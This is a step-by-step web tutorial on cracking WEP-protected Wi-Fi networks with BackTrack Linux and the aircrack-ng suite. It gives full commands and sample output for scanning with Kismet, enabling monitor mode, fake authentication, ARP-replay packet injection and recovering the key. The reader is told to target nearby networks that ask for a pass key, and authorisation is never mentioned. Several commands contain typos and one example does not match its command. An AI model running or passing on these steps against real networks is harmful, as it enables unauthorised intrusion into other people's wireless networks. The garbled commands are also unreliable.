animated GIF

This is a tutorial on how to crack WEP networks. The presumptions we're making is that you have a wireless card that's patched for packet injections. We'll be using a program called aircrack-ng so you have to make sure that you're wireless card is compatible with the aircrack-ng suite. For this tut. I'm using an Atheros wireless card. Other wireless cards that are compatible with aircrack-ng are BroadComs and later versions of Intel Chipsets. If you don't know whether you're wireless card is capable of packet injections, or if you want to buy one that is then click on the link below for a list of the best wireless cards for packet injections :

wireless cards

Okay the next step is to have a working copy of Linux BackTrack. For this tut. I'm using BackTrack 2 but later versions such as BackTrack 3 and 4 are fine also. Some of the commands may be different though so I'd stick to BackTrack 2 if this is your first venture into using Linux. Linux BackTrack was programmed specifically for penetration testing, so anyone who says that Windows is for cracking wireless networks is an idiot.

click here to download Linux Backtrack 2. I'd suggest burning BackTrack 2 onto a cd and setting your computer to boot up from the cd drive. Running Linux this way is simpler than trying to install and run it from your hard drive or from a usb stick.

Before I even run Linux or start packet injections, I'll scope out what networks I can pick up through windows. I'll start by running through the steps for hacking a WEP (Wired Encrypted Privacy) network. Then I'll go through the steps for hacking a WPA (Wi-Fi Protected Access) network.

If you try to connect to a WEP network through windows and it asks you to enter a pass key, then this is a viable network for penetration testing. Take a note of the name of the network and keep it in mind. Now you're ready to boot up Linux from your cd drive. d When Linux boots up, it will ask you to enter "root" as the username and "toor" as the password. Do this and then type in the command "startx" to run Linux BackTrack.

First off you'll need some info. about the target network. We can find out this info. through a built in program in Linux called Kismet. To run Kismet go to start (in Linux BackTrack this is a small cog symbol in the bottom left side of the screen) > BackTrack > Radio Network Analysis > 80211 > Analyzer > Kismet.

When Kismet runs it will ask you to select your wireless card for monitoring. Click on wifi0. A window should now open up with a list of the networks that kismet is picking up on. Hit the S key then the W key. (this will bring up a list of the WEP networks that kismet is picking up on). Then hit enter on your target WEP network (the one you found in windows and intend to hack).

Kismet will now open up a new window containing details of your target network. Get a pen and paper and take note of the SSID (name of the network), BSSID (the network mac address) and the Channel number. It's essential to know these details if you want to hack the network. Also another important point, to crack the network succesfully you need at least one client on it. This is because we're cracking using collected packets of data and we need another user on the network to generate the data packets. Close down Kismet now.

The next piece of information you need is your own mac address. In Linux this is easy to get. Open up a bash command window. You should see the icon for it in the tool bar at the bottom of the screen. It's kind of similar to a dos box in windows (but not really). Type the command "ifconfig wifi0" (without the quotations) into the bash box. Hit enter and take note of your pc's mac address. It's a long number like 00:1D:56:8C:AA:23. You only need to note down the first 12 digits of the address. This is your pc's mac address

Okay so we've got the SSID, BSSID and channell number of the target network. You've also got a note of your own mac address. Let's get hacking.

STEP 1 - START THE WIRELESS INTERFACE IN MONITOR MODE ON AP CHANNELL

What we need to do now is to put your wireless card into monitor mode. Monitor mode allows your wireless card to listen to all packets in the air. Usually a wireless card will only hear packets addressed specifically to your mac address. Not so with monitor mode. With monitor mode you can listen to packets on an Access Point Channell (strong>AP) and capture them for injecting. To do this open up a new bash command window. Input the following.

airmon-ng

The system will respond with something similar to this :

        Interface Chipset Driver

        wifi0 Atheros madwifi-ng
        ath0 Atheros madwifi-ng VAP (parent: wifi0)
        ath1 Atheros madwifi-ng
        kis Atheros madwifi-ng

Stop all of the athX interfaces including ath0. Don't attempt to stop wifi0 though as this is the parent interface. Do this by entering the following command :

airmon-ng stop ath1(here you can enter any athX interface to stop it)

Once you've stopped all athX interfaces. Type in the following command :

airmon-ng start wifi0

You should see the following :

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Notice that ath0 is now in monitor mode. It is the interface we'll be using for packet injections.

Step 2 - START AIRODUMP-NG TO CAPTURE THE IV'S

You don't need to know too much about what an IV is. It's basically just a particular packet of data that you need high numbers of in order to crack the network key. What we'll do now is start up airodump-ng in order to capture the IV's from the target Access Point. This might be confusing if this is your first go at cracking a network, so don't worry too much about the specifics of what we're doing here. Just try to follow the steps.

To start up airodump type the following command into a new bash command box :

airodump-ng -c(channel number) –bssid (mac address of target network) -w output atho

For example :

airodump-ng -c 9 –bssid 00:0E:8E:0C:28:F0 -w output atho

Output is the name I'm giving the file into which the IV's will be stored. You can call it any name you want but I've put ouput for simplicity.

This will open up a new window with something similar to this in it :

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

BSSID STATION PWR Lost Packets Probes

Leave this window open.

STEP 3 - USE AIREPLAY TO DO A FAKE AUTHENTICAION WITH THE ACCESS POINT

This is a very important step and also were it gets interesting. In order for an Access Point to accept packets the source MAC address must already be associated with it. If it isn't the AP will ignore the packets and it sends out a “DeAuthentication” packet in cleartext. You wont be able to gather IV's from the AP because the AP is ignoring all of the injected packets. The single biggest reason why packet injection fails is because the source MAC address isn't associated with the AP.

To associate with our access point use fake authentication. Open up a bash command and type in the following command :

aireplay-ng -1 0 -e (SSID) -a (MAC address of Access Point) -h (your own MAC address) ath0

For example :

aireplay-ng -1 0 -e BTHomeHub-3D4E -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Success looks like this :

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

For picky access points try :

aireplay-ng -1 6000 -o 1 -q 10 -e (SSID) -a (MAC address of Access Point) -h (your own MAC address) ath0

For example :

aireplay-ng -1 0 -e BTHomeHub-3D4E -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

STEP 4 START AIREPLAY-NG IN ARP REQUEST REPLAY MODE

The purpose of this step is to start aireplay-ng in a mode whereby it can listen for ARP (Address Resolution Protocol)requests and re-inject them back into the network. The reason we select ARP request packets, is because the AP will normally re-broadcast them and generate a new IV. With every replay of the ARP packet and rebroadcast an IV is generated and stored in airodump. It sounds tricky but when you see it working it you'll understand it better.

Open another console session and enter the following :

aireplay-ng -3 -b (MAC address of AP) -h (your MAC address) ath0

for example :

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Here is what the screen looks like when ARP requests are being injected :

Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

You can confirm that it's working by checking your airodump-ng screen. Remember at the beginning we set up airodump-ng to gather and store IV's ? It should now look something like this :

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

the #/s in the above example is at 338. This is a decent number however it can range from 100 data packets a second to as high as 500 a second. Typically it's in the range of 300 to 500 per second.

STEP 5 - RUN AIRCRACK-NG TO OBTAIN THE WEP KEY

This is where it all bears fruit. Struggling over commands and having to re-assosciate with the network, or scratching your head at the antics of linux has all been worth it. We're now going to run aircrack-ng to obtain the WEP key from the IV's gathered in the last step.

In a new console session enter the following command :

aircrack-ng - (BSSID) -n 64 output*.cap

for example :

aircrack-ng - 00:14:6C:7E:40:80 -n 64 output*.cap

Notice the -n 64 above. This is instructing aircrack-ng to limit the checking of keys to 64 bits. The network may use a 124 bit encryption however. My advice is that if aircrack-ng is running at 64 bit for a fair length of time, with no results, then try switching it to a 124 bit. To do this simply input the command above but leave out -n 64.

for example

aircrack-ng - 00:14:6C:7E:40:80 output*.cap

You can run aircrack-ng while still generating packets. In a short time the WEP key will be calculated and presented :) For a 64 bit you'll need roughly 250,000 IV's to crack the key. For a 124 bit you'll need roughly 1,500,000 IV's. Sweet success looks like this :

Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%

Free Web Hosting